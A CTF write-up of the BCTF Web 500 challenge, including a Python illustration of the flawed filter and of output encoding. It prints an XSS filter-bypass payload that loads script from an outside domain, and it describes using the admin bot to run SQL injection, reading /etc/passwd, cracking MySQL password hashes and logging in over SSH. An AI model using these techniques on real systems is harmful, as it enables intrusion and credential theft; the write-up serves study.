
BCTF – Web 500 – Homework

Homework – WEB 500

This is a very quick and dirty write-up. However, I have seen that no one has shared their solution for this challenge, so I decided to share mine.

Dirbusting

We started by dirbusting the web service and, thanks to @d90andrew, we managed to find the source code of the application: the site's Mercurial repository was exposed. You can dump the source code of such a repository using the Mercurial extractor at https://cirt.net/hg-decode.

Source Code Analysis

We analysed the source code and found vulnerabilities in the following file.

We can see that read.php in the admin folder is vulnerable to SQLi and XSS. My initial plan was to steal the admin's cookie, then go to the read.php page, exploit the SQLi and get the flag from the database.

Exploiting the XSS was not straightforward: a WAF filtered the data as it was inserted into the database, to protect against XSS.

From the source code, we need to bypass the filter function stripStr() to get a working XSS. The function looks good, but it is bypassable.
One way to bypass it is to submit a request where the content parameter contains the following:

<scridatapt src=//ibrahim-elsayed.com/test.js></scridatapt>

Basically, "data" is removed and we end up with

<script src=//ibrahim-elsayed.com/test.js></script>
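As an added illustration (not code from the challenge or from this write-up), the following Python models the single-pass keyword stripping that lets the payload above reassemble. The keyword list and pass order are assumptions, since the real stripStr() is not reproduced here; the point is the contrast between a blacklist filter and output encoding, which does not depend on guessing keywords.

```python
import html

# Constructed stand-in for the challenge's stripStr() (assumption: the real
# function is not shown in the write-up). It models the behaviour described:
# blacklisted keywords are deleted in one pass, in a fixed order, so removing
# one keyword can glue the remaining characters into another keyword.
BLACKLIST = ["script", "data"]

# Payload quoted in the write-up: "data" sits inside "scri|data|pt".
PAYLOAD = "<scridatapt src=//ibrahim-elsayed.com/test.js></scridatapt>"


def strip_str_naive(s: str) -> str:
    """One-pass removal: 'script' is checked first, so it is not found;
    deleting 'data' afterwards leaves a well-formed <script> tag."""
    for word in BLACKLIST:
        s = s.replace(word, "")
    return s


def strip_str_fixed_point(s: str) -> str:
    """Repeat stripping until nothing changes. This closes the reassembly
    hole, but it is still a blacklist: anything not on the list (case
    variants, entity encodings, other tags) passes straight through."""
    while True:
        out = strip_str_naive(s)
        if out == s:
            return out
        s = out


def render_note_safely(s: str) -> str:
    """The defender's answer: store the note verbatim and HTML-encode it at
    output time, so no markup can be formed whatever the keyword list says."""
    return html.escape(s, quote=True)


if __name__ == "__main__":
    print("naive filter  :", strip_str_naive(PAYLOAD))
    print("fixed point   :", strip_str_fixed_point(PAYLOAD))
    print("output encoded:", render_note_safely(PAYLOAD))
```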

We tried to steal the admin's cookie, but unfortunately it was an HttpOnly cookie and there was no page that leaked it.

But we still need to exploit the SQLi. How?

Exploitation

We decided to do it through the XSS vulnerability. Basically, the bot loads our malicious JS code, which will:

1- Submit a note
2- Visit /admin/read.php with a SQL injection in the X-Forwarded-For header (this has to happen before the note is automatically read)
3- Read the output of the SQL injection and send it to my server

After settling on the strategy, Vos and I wrote the following JavaScript code to exploit the SQLi through the XSS.

Finding the flag

We expected to find the flag in the database, either in another table or in the same table, in a file uploaded by the admin.

We checked the database but couldn't find the flag anywhere. We tried to read files from MySQL with load_file('/etc/passwd'), but we didn't have enough permissions.

After a while, I port scanned the server and found that the SSH port was open. Once I saw it, I knew where I could find the flag. I dumped the users and password hashes from mysql.user and then tried to crack them.

We knew the password for bctf from the source code of the web application. I tried to log in over SSH with it and it didn't work. That was expected, because otherwise there would be no point to the SQLi: it would have been enough to dump the source code and read the password. I tried to crack root and firesun. I expected that root wouldn't be crackable, basically because it is root ^^. firesun was the one I was targeting.

After cracking the password, I connected over SSH as the firesun user and ....

[Screenshot, 2016-03-20: the SSH session]

PS: all the SQLi exploitation was done through the bot, using the XSS. The moral of the story is that XSS can do more than steal cookies!

Published in writeups
